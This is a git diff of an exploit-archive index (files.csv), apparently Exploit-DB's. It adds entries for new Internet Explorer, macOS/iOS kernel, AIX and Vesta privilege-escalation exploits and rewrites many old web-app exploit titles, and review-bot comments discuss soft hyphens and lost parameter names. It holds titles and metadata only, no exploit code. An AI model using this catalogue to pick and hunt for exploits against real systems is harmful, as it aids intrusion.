diff --git a/files.csv b/files.csv
index b1cb62ae9..a7326637b 100644
--- a/files.csv
+++ b/files.csv
@@ -3692,6 +3692,7 @@ id,file,description,date,author,platform,type,port
 29310,platforms/multiple/dos/29310.txt,"WikiReader 1.12 - URL Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",multiple,dos,0
 29473,platforms/linux/dos/29473.txt,"Squid Proxy 2.5/2.6 - FTP URI Remote Denial of Service",2007-01-16,"David Duncan Ross Palmer",linux,dos,0
 29362,platforms/multiple/dos/29362.pl,"DB Hub 0.3 - Remote Denial of Service",2006-12-27,"Critical Security",multiple,dos,0
+40960,platforms/windows/dos/40960.svg,"Microsoft Internet Explorer 11 - MSHTML CPaste­Command::Convert­Bitmapto­Png Heap-Based Buffer Overflow (MS14-056)",2016-12-22,Skylined,windows,dos,0
 29387,platforms/windows/dos/29387.pl,"Plogue Sforzando 1.665 - Buffer Overflow (SEH) (PoC)",2013-11-03,"Mike Czumak",windows,dos,0
 29399,platforms/linux/dos/29399.txt,"Multiple PDF Readers - Multiple Remote Buffer Overflow",2007-01-06,LMH,linux,dos,0
 29402,platforms/hardware/dos/29402.txt,"Packeteer PacketShaper 8.0 - Multiple Buffer Overflow Denial of Service Vulnerabilities",2007-01-08,kian.mohageri,hardware,dos,0
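Review bot: The added 40960 description appears to carry soft-hyphen (U+00AD) characters inside the symbol name `CPaste­Command::Convert­Bitmapto­Png`; they render invisibly but make a plain-text search of the index for `CPasteCommand` or `ConvertBitmaptoPng` miss the row. The same characters survive in the rewritten 40946 line of the next hunk (`CSplice­Tree­Engine::Remove­Splice`) and in the 40935/40944 context rows, so a title-normalisation commit like this one is the natural place to strip them. Suggest storing the symbol as `CPasteCommand::ConvertBitmaptoPng` and applying the same cleanup to the other Skylined titles.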
@@ -5320,9 +5321,14 @@ id,file,description,date,author,platform,type,port
 40935,platforms/windows/dos/40935.html,"Microsoft Internet Explorer 9 - IEFRAME CView::Ensure­Size Use-After-Free (MS13-021)",2016-12-16,Skylined,windows,dos,0
 40944,platforms/multiple/dos/40944.py,"Google Chrome < 31.0.1650.48 - HTTP 1xx base::String­Tokenizer­T<...>::Quick­Get­Next Out-of-Bounds Read",2016-12-19,Skylined,multiple,dos,0
 40945,platforms/android/dos/40945.txt,"Google Android - WifiNative::setHotlist Stack Overflow",2016-12-20,"Google Security Research",android,dos,0
-40946,platforms/windows/dos/40946.html,"Microsoft Internet Explorer 11 MSHTML - CSplice­Tree­Engine::Remove­Splice Use-After-Free (MS14-035)",2016-12-20,Skylined,windows,dos,0
+40946,platforms/windows/dos/40946.html,"Microsoft Internet Explorer 11 - MSHTML CSplice­Tree­Engine::Remove­Splice Use-After-Free (MS14-035)",2016-12-20,Skylined,windows,dos,0
 40947,platforms/windows/dos/40947.html,"Microsoft Edge - SIMD.toLocaleString Uninitialized Memory (MS16-145)",2016-12-21,"Google Security Research",windows,dos,0
 40948,platforms/windows/dos/40948.html,"Microsoft Edge - Internationalization Initialization Type Confusion (MS16-144)",2016-12-21,"Google Security Research",windows,dos,0
+40952,platforms/macos/dos/40952.c,"macOS 10.12.1 Kernel - Writable Privileged IOKit Registry Properties Code Execution",2016-12-22,"Google Security Research",macos,dos,0
+40954,platforms/macos/dos/40954.c,"macOS 10.12 - Double vm_deallocate in Userspace MIG Code Use-After-Free",2016-12-22,"Google Security Research",macos,dos,0
+40955,platforms/multiple/dos/40955.txt,"macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free",2016-12-22,"Google Security Research",multiple,dos,0
+40958,platforms/multiple/dos/40958.c,"macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
+40959,platforms/multiple/dos/40959.c,"macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8723,6 +8729,10 @@ id,file,description,date,author,platform,type,port
 40937,platforms/linux/local/40937.txt,"Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution",2016-12-14,"Donncha OCearbhaill",linux,local,0
 40938,platforms/linux/local/40938.py,"RedStar 3.0 Server - 'BEAM & RSSMON' Command Execution (Shellshock)",2016-12-18,"Hacker Fantastic",linux,local,0
 40943,platforms/linux/local/40943.txt,"Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",linux,local,0
+40950,platforms/aix/local/40950.sh,"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Privilege Escalation",2016-12-22,"Hector X. Monsegur",aix,local,0
+40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0
+40956,platforms/macos/local/40956.c,"macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0
+40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -16076,7 +16086,7 @@ id,file,description,date,author,platform,type,port
 1576,platforms/php/webapps/1576.txt,"Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Attack Vectors",2006-03-11,Nomenumbra,php,webapps,0
 1581,platforms/php/webapps/1581.pl,"Simple PHP Blog 0.4.7.1 - Remote Command Execution",2006-03-13,rgod,php,webapps,0
 1585,platforms/php/webapps/1585.php,"PHP iCalendar 2.21 - 'cookie' Remote Code Execution",2006-03-15,rgod,php,webapps,0
-1586,platforms/php/webapps/1586.php,"PHP iCalendar 2.21 - (publish.ical.php) Remote Code Execution",2006-03-15,rgod,php,webapps,0
+1586,platforms/php/webapps/1586.php,"PHP iCalendar 2.21 - 'publish.ical.php' Remote Code Execution",2006-03-15,rgod,php,webapps,0
 1587,platforms/php/webapps/1587.pl,"KnowledgebasePublisher 1.2 - 'Include' Remote Code Execution",2006-03-15,uid0,php,webapps,0
 1588,platforms/php/webapps/1588.php,"nodez 4.6.1.1 mercury - Multiple Vulnerabilities",2006-03-18,rgod,php,webapps,0
 1589,platforms/asp/webapps/1589.pl,"BetaParticle Blog 6.0 - 'fldGalleryID' SQL Injection",2006-03-18,nukedx,asp,webapps,0
@@ -16344,7 +16354,7 @@ id,file,description,date,author,platform,type,port
 2003,platforms/php/webapps/2003.txt,"SQuery 4.5 - (gore.php) Remote File Inclusion",2006-07-10,SHiKaA,php,webapps,0
 2007,platforms/php/webapps/2007.php,"phpBB 3 - 'memberlist.php' SQL Injection",2006-07-13,rgod,php,webapps,0
 2008,platforms/php/webapps/2008.php,"Phorum 5 - 'pm.php' Arbitrary Local Inclusion Exploit",2006-07-13,rgod,php,webapps,0
-2009,platforms/php/webapps/2009.txt,"CzarNews 1.14 - (tpath) Remote File Inclusion",2006-07-13,SHiKaA,php,webapps,0
+2009,platforms/php/webapps/2009.txt,"CzarNews 1.14 - 'tpath' Parameter Remote File Inclusion",2006-07-13,SHiKaA,php,webapps,0
 2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 <= 2.1.6 - SQL Injection (1)",2006-07-14,RusH,php,webapps,0
 2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) 1.1.5 - 'CLIENT-IP' SQL Injection",2006-07-15,rgod,php,webapps,0
 2018,platforms/php/webapps/2018.txt,"FlushCMS 1.0.0-pre2 - (class.rich.php) Remote File Inclusion",2006-07-16,igi,php,webapps,0
@@ -16838,7 +16848,7 @@ id,file,description,date,author,platform,type,port
 2655,platforms/php/webapps/2655.php,"MiniBB 2.0.2 - 'bb_func_txt.php' Remote File Inclusion",2006-10-26,Kacper,php,webapps,0
 2656,platforms/php/webapps/2656.txt,"MiniBill 20061010 - 'menu_builder.php' File Inclusion",2006-10-26,"Mehmet Ince",php,webapps,0
 2658,platforms/php/webapps/2658.php,"Light Blog Remote - Multiple Vulnerabilities",2006-10-27,BlackHawk,php,webapps,0
-2659,platforms/php/webapps/2659.php,"N/X WCMS 4.1 - (nxheader.inc.php) Remote File Inclusion",2006-10-27,Kacper,php,webapps,0
+2659,platforms/php/webapps/2659.php,"N/X WCMS 4.1 - 'nxheader.inc.php' Remote File Inclusion",2006-10-27,Kacper,php,webapps,0
 2660,platforms/php/webapps/2660.php,"Coppermine Photo Gallery 1.4.9 - SQL Injection",2006-10-27,w4ck1ng,php,webapps,0
 2661,platforms/asp/webapps/2661.asp,"PHP League 0.82 - (classement.php) SQL Injection",2006-10-27,ajann,asp,webapps,0
 2662,platforms/asp/webapps/2662.txt,"Hosting Controller 6.1 Hotfix 3.2 - Unauthenticated Access",2006-10-27,"Soroush Dalili",asp,webapps,0
@@ -16942,7 +16952,7 @@ id,file,description,date,author,platform,type,port
 2794,platforms/php/webapps/2794.txt,"mg.applanix 1.3.1 - (apx_root_path) Remote File Inclusion",2006-11-17,v1per-haCker,php,webapps,0
 2795,platforms/php/webapps/2795.txt,"DoSePa 1.0.4 - 'textview.php' Information Disclosure",2006-11-17,"Craig Heffner",php,webapps,0
 2796,platforms/php/webapps/2796.php,"miniCWB 1.0.0 - (contact.php) Local File Inclusion",2006-11-17,Kacper,php,webapps,0
-2797,platforms/php/webapps/2797.txt,"Powies pForum 1.29a - (editpoll.php) SQL Injection",2006-11-17,SHiKaA,php,webapps,0
+2797,platforms/php/webapps/2797.txt,"Powies pForum 1.29a - 'editpoll.php' SQL Injection",2006-11-17,SHiKaA,php,webapps,0
 2798,platforms/php/webapps/2798.txt,"Powies MatchMaker 4.05 - (matchdetail.php) SQL Injection",2006-11-17,SHiKaA,php,webapps,0
 2799,platforms/php/webapps/2799.txt,"mxBB Module calsnails 1.06 - (mx_common.php) File Inclusion",2006-11-17,bd0rk,php,webapps,0
 2807,platforms/php/webapps/2807.pl,"Joomla! Component MosReporter 0.9.3 - Remote File Inclusion",2006-11-17,Crackers_Child,php,webapps,0
@@ -17342,7 +17352,7 @@ id,file,description,date,author,platform,type,port
 3455,platforms/php/webapps/3455.htm,"JobSitePro 1.0 - 'search.php' SQL Injection",2007-03-11,ajann,php,webapps,0
 3456,platforms/php/webapps/3456.pl,"Top Auction 1.0 - (viewcat.php) SQL Injection",2007-03-11,ajann,php,webapps,0
 3457,platforms/php/webapps/3457.pl,"SonicMailer Pro 3.2.3 - 'index.php' SQL Injection",2007-03-11,ajann,php,webapps,0
-3458,platforms/php/webapps/3458.txt,"AssetMan 2.4a - (download_pdf.php) Remote File Disclosure",2007-03-11,"BorN To K!LL",php,webapps,0
+3458,platforms/php/webapps/3458.txt,"AssetMan 2.4a - 'download_pdf.php' Remote File Disclosure",2007-03-11,"BorN To K!LL",php,webapps,0
 3459,platforms/php/webapps/3459.txt,"cPanel 10.9.x - 'Fantastico' Local File Inclusion",2007-03-11,"cyb3rt & 020",php,webapps,0
 3465,platforms/php/webapps/3465.txt,"OES (Open Educational System) 0.1beta - Remote File Inclusion",2007-03-12,K-159,php,webapps,0
 3466,platforms/asp/webapps/3466.txt,"BP Blog 7.0 - 'layout' Parameter SQL Injection",2007-03-12,BeyazKurt,asp,webapps,0
@@ -17356,7 +17366,7 @@ id,file,description,date,author,platform,type,port
 3476,platforms/php/webapps/3476.pl,"Zomplog 3.7.6 (Windows x86) - Local File Inclusion",2007-03-14,Bl0od3r,php,webapps,0
 3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 - (comments.php id) SQL Injection",2007-03-14,WiLdBoY,php,webapps,0
 3478,platforms/php/webapps/3478.htm,"Dayfox Blog 4 - 'postpost.php' Remote Code Execution",2007-03-14,Dj7xpl,php,webapps,0
-3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 - (AdminBlogNewsEdit.asp) Remote Authentication Bypass",2007-03-15,WiLdBoY,asp,webapps,0
+3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 - Remote Authentication Bypass",2007-03-15,WiLdBoY,asp,webapps,0
 3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x - (usergroups.php) SQL Injection",2007-03-15,x666,php,webapps,0
 3484,platforms/php/webapps/3484.txt,"WebLog - 'index.php' Remote File Disclosure",2007-03-15,Dj7xpl,php,webapps,0
 3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 - 'INCLUDE_PATH' Remote File Inclusion",2007-03-15,the_day,php,webapps,0
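Review bot: The rewritten 3481 line drops the affected script name (`AdminBlogNewsEdit.asp`) instead of requoting it, so the description loses the only detail that locates the flaw, whereas the rest of this commit keeps the file or parameter in quotes (e.g. `'publish.ical.php'`). The same information loss appears in later hunks: 4005 loses `ROOT`, 6475 loses `footer`, 6516 loses `image`, and several `'file.php param'` titles keep only the file name. Suggest `Orion-Blog 2.0 - 'AdminBlogNewsEdit.asp' Remote Authentication Bypass` here and the `'<param>' Parameter` form already used elsewhere in the diff for the others.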
@@ -17665,7 +17675,7 @@ id,file,description,date,author,platform,type,port
 3958,platforms/php/webapps/3958.php,"Alstrasoft Template Seller Pro 3.25 - Admin Password Change",2007-05-20,BlackHawk,php,webapps,0
 3959,platforms/php/webapps/3959.php,"Alstrasoft Template Seller Pro 3.25 - Remote Code Execution",2007-05-20,BlackHawk,php,webapps,0
 3960,platforms/php/webapps/3960.php,"WordPress 2.1.3 - 'admin-ajax.php' SQL Injection Blind Fishing Exploit",2007-05-21,waraxe,php,webapps,0
-3962,platforms/php/webapps/3962.txt,"Ol BookMarks Manager 0.7.4 - (root) Remote File Inclusion",2007-05-21,"ThE TiGeR",php,webapps,0
+3962,platforms/php/webapps/3962.txt,"Ol BookMarks Manager 0.7.4 - 'root' Parameter Remote File Inclusion",2007-05-21,"ThE TiGeR",php,webapps,0
 3963,platforms/php/webapps/3963.txt,"TutorialCMS 1.01 - Authentication Bypass",2007-05-21,Silentz,php,webapps,0
 3964,platforms/php/webapps/3964.txt,"Ol BookMarks Manager 0.7.4 - SQL Injection",2007-05-21,"Mehmet Ince",php,webapps,0
 3970,platforms/php/webapps/3970.txt,"BtiTracker 1.4.1 - (become admin) SQL Injection",2007-05-22,m@ge|ozz,php,webapps,0
@@ -17689,7 +17699,7 @@ id,file,description,date,author,platform,type,port
 4000,platforms/php/webapps/4000.txt,"wanewsletter 2.1.3 - Remote File Inclusion",2007-05-28,Mogatil,php,webapps,0
 4003,platforms/php/webapps/4003.sh,"Joomla! Component Phil-a-Form 1.2.0.0 - SQL Injection",2007-05-28,CypherXero,php,webapps,0
 4004,platforms/php/webapps/4004.php,"Inout Search Engine - Remote Code Execution",2007-05-29,BlackHawk,php,webapps,0
-4005,platforms/php/webapps/4005.txt,"AdminBot 9.0.5 - (live_status.lib.php ROOT) Remote File Inclusion",2007-05-29,"ThE TiGeR",php,webapps,0
+4005,platforms/php/webapps/4005.txt,"AdminBot 9.0.5 - 'live_status.lib.php' Remote File Inclusion",2007-05-29,"ThE TiGeR",php,webapps,0
 4006,platforms/php/webapps/4006.php,"Pheap 2.0 - Authentication Bypass / Remote Code Execution",2007-05-29,Silentz,php,webapps,0
 4007,platforms/asp/webapps/4007.txt,"Vizayn Urun Tanitim Sistemi 0.2 - (tr) SQL Injection",2007-05-30,BAHADIR,asp,webapps,0
 4019,platforms/php/webapps/4019.php,"Particle Gallery 1.0.1 - SQL Injection",2007-06-01,Silentz,php,webapps,0
@@ -17808,7 +17818,7 @@ id,file,description,date,author,platform,type,port
 4199,platforms/php/webapps/4199.txt,"Md-Pro 1.0.8x - (Topics topicid) SQL Injection",2007-07-18,anonymous,php,webapps,0
 4201,platforms/php/webapps/4201.txt,"Joomla! Component Pony Gallery 1.5 - SQL Injection",2007-07-19,ajann,php,webapps,0
 4206,platforms/php/webapps/4206.txt,"Blog System 1.x - (index.php news_id) SQL Injection",2007-07-20,t0pP8uZz,php,webapps,0
-4209,platforms/php/webapps/4209.txt,"WSN Links Basic Edition - (displaycat catid) SQL Injection",2007-07-21,t0pP8uZz,php,webapps,0
+4209,platforms/php/webapps/4209.txt,"WSN Links Basic Edition - 'catid' Parameter SQL Injection",2007-07-21,t0pP8uZz,php,webapps,0
 4210,platforms/php/webapps/4210.txt,"RGameScript Pro - 'page.php id' Remote File Inclusion",2007-07-21,Warpboy,php,webapps,0
 4211,platforms/php/webapps/4211.htm,"JBlog 1.0 - Create / Delete Admin Authentication Bypass",2007-07-21,s4mi,php,webapps,0
 4212,platforms/php/webapps/4212.txt,"Joomla! 1.5 Beta 2 - 'Search' Remote Code Execution",2007-07-22,"Johannes Greil",php,webapps,0
@@ -17895,7 +17905,7 @@ id,file,description,date,author,platform,type,port
 4384,platforms/php/webapps/4384.txt,"WebED 0.8999a - Multiple Remote File Inclusion",2007-09-08,MhZ91,php,webapps,0
 4385,platforms/php/webapps/4385.txt,"AuraCMS 1.5rc - Multiple SQL Injections",2007-09-09,k1tk4t,php,webapps,0
 4386,platforms/php/webapps/4386.txt,"Sisfo Kampus 2006 - 'dwoprn.php f' Arbitrary File Download",2007-09-10,k-one,php,webapps,0
-4387,platforms/php/webapps/4387.txt,"phpRealty 0.02 - (MGR) Multiple Remote File Inclusion",2007-09-10,QTRinux,php,webapps,0
+4387,platforms/php/webapps/4387.txt,"phpRealty 0.02 - 'MGR' Parameter Multiple Remote File Inclusion",2007-09-10,QTRinux,php,webapps,0
 4390,platforms/php/webapps/4390.txt,"AuraCMS 2.1 - Remote File Attachment / Local File Inclusion",2007-09-10,k1tk4t,php,webapps,0
 4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 - 'ROOT_PATH' Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps,0
 4396,platforms/php/webapps/4396.txt,"X-Cart - Multiple Remote File Inclusion",2007-09-11,aLiiF,php,webapps,0
@@ -18044,8 +18054,8 @@ id,file,description,date,author,platform,type,port
 4607,platforms/php/webapps/4607.txt,"SyndeoCMS 2.5.01 - (cmsdir) Remote File Inclusion",2007-11-04,mdx,php,webapps,0
 4608,platforms/php/webapps/4608.php,"JBC Explorer 7.20 RC 1 - Remote Code Execution",2007-11-05,DarkFig,php,webapps,0
 4609,platforms/asp/webapps/4609.txt,"ASP Message Board 2.2.1c - SQL Injection",2007-11-05,Q7x,asp,webapps,0
-4611,platforms/php/webapps/4611.txt,"jPORTAL 2 - mailer.php SQL Injection",2007-11-06,Kacper,php,webapps,0
-4614,platforms/php/webapps/4614.txt,"jPORTAL 2.3.1 - articles.php SQL Injection",2007-11-09,Alexsize,php,webapps,0
+4611,platforms/php/webapps/4611.txt,"jPORTAL 2 - 'mailer.php' SQL Injection",2007-11-06,Kacper,php,webapps,0
+4614,platforms/php/webapps/4614.txt,"jPORTAL 2.3.1 - 'articles.php' SQL Injection",2007-11-09,Alexsize,php,webapps,0
 4617,platforms/php/webapps/4617.txt,"Softbiz Auctions Script - product_desc.php SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0
 4618,platforms/php/webapps/4618.txt,"Softbiz Ad Management plus Script 1 - SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0
 4619,platforms/php/webapps/4619.txt,"Softbiz Banner Exchange Network Script 1.0 - SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0
@@ -19407,38 +19417,38 @@ id,file,description,date,author,platform,type,port
 6412,platforms/php/webapps/6412.txt,"AvailScript Classmate Script - 'viewprofile.php' SQL Injection",2008-09-09,Stack,php,webapps,0
 6413,platforms/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusion",2008-09-10,SirGod,php,webapps,0
 6416,platforms/php/webapps/6416.txt,"Libera CMS 1.12 - 'cookie' SQL Injection",2008-09-10,StAkeR,php,webapps,0
-6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - Authenticated (jid) SQL Injection",2008-09-10,InjEctOr5,php,webapps,0
+6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - 'jid' Parameter SQL Injection",2008-09-10,InjEctOr5,php,webapps,0
 6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload",2008-09-10,reptil,php,webapps,0
 6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0
 6421,platforms/php/webapps/6421.php,"WordPress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0
 6422,platforms/php/webapps/6422.txt,"PHPVID 1.1 - Cross-Site Scripting / SQL Injection",2008-09-10,r45c4l,php,webapps,0
 6423,platforms/php/webapps/6423.txt,"Zanfi CMS lite / Jaw Portal free - 'page' Parameter SQL Injection",2008-09-10,Cru3l.b0y,php,webapps,0
-6425,platforms/php/webapps/6425.txt,"PhpWebGallery 1.3.4 - Cross-Site Scripting / Local File Inclusion",2008-09-11,"Khashayar Fereidani",php,webapps,0
+6425,platforms/php/webapps/6425.txt,"PHPWebGallery 1.3.4 - Cross-Site Scripting / Local File Inclusion",2008-09-11,"Khashayar Fereidani",php,webapps,0
 6426,platforms/php/webapps/6426.txt,"Autodealers CMS AutOnline - 'pageid' Parameter SQL Injection",2008-09-11,r45c4l,php,webapps,0
 6427,platforms/php/webapps/6427.txt,"Sports Clubs Web Panel 0.0.1 - 'p' Parameter Local File Inclusion",2008-09-11,StAkeR,php,webapps,0
 6428,platforms/php/webapps/6428.pl,"Easy Photo Gallery 2.1 - Cross-Site Scripting / File Disclosure/Bypass / SQL Injection",2008-09-11,"Khashayar Fereidani",php,webapps,0
-6430,platforms/php/webapps/6430.txt,"D-iscussion Board 3.01 - (topic) Local File Inclusion",2008-09-11,SirGod,php,webapps,0
+6430,platforms/php/webapps/6430.txt,"D-iscussion Board 3.01 - 'topic' Parameter Local File Inclusion",2008-09-11,SirGod,php,webapps,0
 6431,platforms/php/webapps/6431.pl,"phsBlog 0.2 - Bypass SQL Injection Filtering Exploit",2008-09-11,"Khashayar Fereidani",php,webapps,0
 6432,platforms/php/webapps/6432.py,"minb 0.1.0 - Remote Code Execution",2008-09-11,"Khashayar Fereidani",php,webapps,0
 6433,platforms/php/webapps/6433.txt,"Autodealers CMS AutOnline - 'id' Parameter SQL Injection",2008-09-11,ZoRLu,php,webapps,0
 6435,platforms/php/webapps/6435.txt,"Sports Clubs Web Panel 0.0.1 - 'id' Parameter SQL Injection",2008-09-11,"Virangar Security",php,webapps,0
-6436,platforms/php/webapps/6436.txt,"PhpWebGallery 1.3.4 - Blind SQL Injection",2008-09-11,Stack,php,webapps,0
+6436,platforms/php/webapps/6436.txt,"PHPWebGallery 1.3.4 - Blind SQL Injection",2008-09-11,Stack,php,webapps,0
 6437,platforms/php/webapps/6437.txt,"Easy Photo Gallery 2.1 - Arbitrary Add Admin / remove user",2008-09-11,Stack,php,webapps,0
 6438,platforms/php/webapps/6438.pl,"Yourownbux 4.0 - 'cookie' Authentication Bypass",2008-09-11,Tec-n0x,php,webapps,0
 6439,platforms/php/webapps/6439.txt,"Sports Clubs Web Panel 0.0.1 - Arbitrary File Upload",2008-09-12,Stack,php,webapps,0
-6440,platforms/php/webapps/6440.pl,"PhpWebGallery 1.3.4 - Blind SQL Injection",2008-09-12,ka0x,php,webapps,0
-6442,platforms/php/webapps/6442.txt,"pForum 1.30 - (showprofil.php id) SQL Injection",2008-09-12,tmh,php,webapps,0
-6443,platforms/php/webapps/6443.pl,"WebPortal CMS 0.7.4 - (download.php aid) SQL Injection",2008-09-12,StAkeR,php,webapps,0
-6444,platforms/php/webapps/6444.txt,"iBoutique 4.0 - (cat) SQL Injection",2008-09-12,r45c4l,php,webapps,0
-6445,platforms/php/webapps/6445.txt,"SkaLinks 1.5 - (register.php) Arbitrary Add Editor",2008-09-12,mr.al7rbi,php,webapps,0
-6446,platforms/php/webapps/6446.txt,"vbLOGIX Tutorial Script 1.0 - 'cat_id' SQL Injection",2008-09-12,FIREH4CK3R,php,webapps,0
+6440,platforms/php/webapps/6440.pl,"PHPWebGallery 1.3.4 - Blind SQL Injection",2008-09-12,ka0x,php,webapps,0
+6442,platforms/php/webapps/6442.txt,"pForum 1.30 - 'showprofil.php' SQL Injection",2008-09-12,tmh,php,webapps,0
+6443,platforms/php/webapps/6443.pl,"WebPortal CMS 0.7.4 - 'download.php' SQL Injection",2008-09-12,StAkeR,php,webapps,0
+6444,platforms/php/webapps/6444.txt,"iBoutique 4.0 - 'cat' Parameter SQL Injection",2008-09-12,r45c4l,php,webapps,0
+6445,platforms/php/webapps/6445.txt,"SkaLinks 1.5 - 'register.php' Arbitrary Add Editor",2008-09-12,mr.al7rbi,php,webapps,0
+6446,platforms/php/webapps/6446.txt,"vbLOGIX Tutorial Script 1.0 - 'cat_id' Parameter SQL Injection",2008-09-12,FIREH4CK3R,php,webapps,0
 6447,platforms/php/webapps/6447.txt,"pNews 2.03 - 'newsid' Parameter SQL Injection",2008-09-12,r45c4l,php,webapps,0
 6448,platforms/php/webapps/6448.txt,"WebPortal CMS 0.7.4 - 'FCKeditor' Arbitrary File Upload",2008-09-12,S.W.A.T.,php,webapps,0
-6449,platforms/php/webapps/6449.php,"pLink 2.07 - (linkto.php id) Blind SQL Injection",2008-09-13,Stack,php,webapps,0
+6449,platforms/php/webapps/6449.php,"pLink 2.07 - 'linkto.php' Blind SQL Injection",2008-09-13,Stack,php,webapps,0
 6450,platforms/php/webapps/6450.pl,"Sports Clubs Web Panel 0.0.1 - Remote Game Delete Exploit",2008-09-13,ka0x,php,webapps,0
 6451,platforms/php/webapps/6451.txt,"Talkback 2.3.6 - Multiple Local File Inclusion / PHPInfo Disclosure Vulnerabilities",2008-09-13,SirGod,php,webapps,0
 6452,platforms/php/webapps/6452.txt,"phpsmartcom 0.2 - Local File Inclusion / SQL Injection",2008-09-13,r3dm0v3,php,webapps,0
-6453,platforms/asp/webapps/6453.txt,"FoT Video scripti 1.1b - (oyun) SQL Injection",2008-09-13,Crackers_Child,asp,webapps,0
+6453,platforms/asp/webapps/6453.txt,"FoT Video scripti 1.1b - 'oyun' Parameter SQL Injection",2008-09-13,Crackers_Child,asp,webapps,0
 6455,platforms/php/webapps/6455.txt,"Linkarity - 'link.php' SQL Injection",2008-09-13,"Egypt Coder",php,webapps,0
 6456,platforms/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 - Arbitrary Database Backup",2008-09-13,SirGod,php,webapps,0
 6457,platforms/php/webapps/6457.txt,"Free PHP VX Guestbook 1.06 - Insecure Cookie Handling",2008-09-14,Stack,php,webapps,0
@@ -19446,23 +19456,23 @@ id,file,description,date,author,platform,type,port
 6461,platforms/php/webapps/6461.txt,"Cpanel 11.x - 'Fantastico' Local File Inclusion (sec Bypass)",2008-09-14,joker_1,php,webapps,0
 6462,platforms/php/webapps/6462.pl,"CzarNews 1.20 - 'cookie' SQL Injection",2008-09-15,StAkeR,php,webapps,0
 6464,platforms/php/webapps/6464.txt,"CzarNews 1.20 - (Account Hijacking) SQL Injection",2008-09-15,0ut0fbound,php,webapps,0
-6465,platforms/php/webapps/6465.txt,"Pre Real Estate Listings - 'search.php c' SQL Injection",2008-09-15,JosS,php,webapps,0
+6465,platforms/php/webapps/6465.txt,"Pre Real Estate Listings - 'search.php' SQL Injection",2008-09-15,JosS,php,webapps,0
 6466,platforms/php/webapps/6466.txt,"Link Bid Script 1.5 - Multiple SQL Injections",2008-09-15,SirGod,php,webapps,0
-6467,platforms/php/webapps/6467.txt,"iScripts EasyIndex - (produid) SQL Injection",2008-09-16,SirGod,php,webapps,0
+6467,platforms/php/webapps/6467.txt,"iScripts EasyIndex - 'produid' Parameter SQL Injection",2008-09-16,SirGod,php,webapps,0
 6468,platforms/php/webapps/6468.txt,"Attachmax Dolphin 2.1.0 - Multiple Vulnerabilities",2008-09-16,K-159,php,webapps,0
 6469,platforms/php/webapps/6469.txt,"Gonafish LinksCaffePRO 4.5 - 'index.php' SQL Injection",2008-09-16,sl4xUz,php,webapps,0
-6470,platforms/asp/webapps/6470.txt,"Hotel Reservation System - 'city.asp city' Blind SQL Injection",2008-09-16,JosS,asp,webapps,0
-6473,platforms/php/webapps/6473.txt,"phpRealty 0.3 - (INC) Remote File Inclusion",2008-09-17,ka0x,php,webapps,0
-6475,platforms/php/webapps/6475.txt,"PHP Crawler 0.8 - (footer) Remote File Inclusion",2008-09-17,Piker,php,webapps,0
-6478,platforms/php/webapps/6478.txt,"Technote 7 - (shop_this_skin_path) Remote File Inclusion",2008-09-17,webDEViL,php,webapps,0
+6470,platforms/asp/webapps/6470.txt,"Hotel Reservation System - 'city.asp' Blind SQL Injection",2008-09-16,JosS,asp,webapps,0
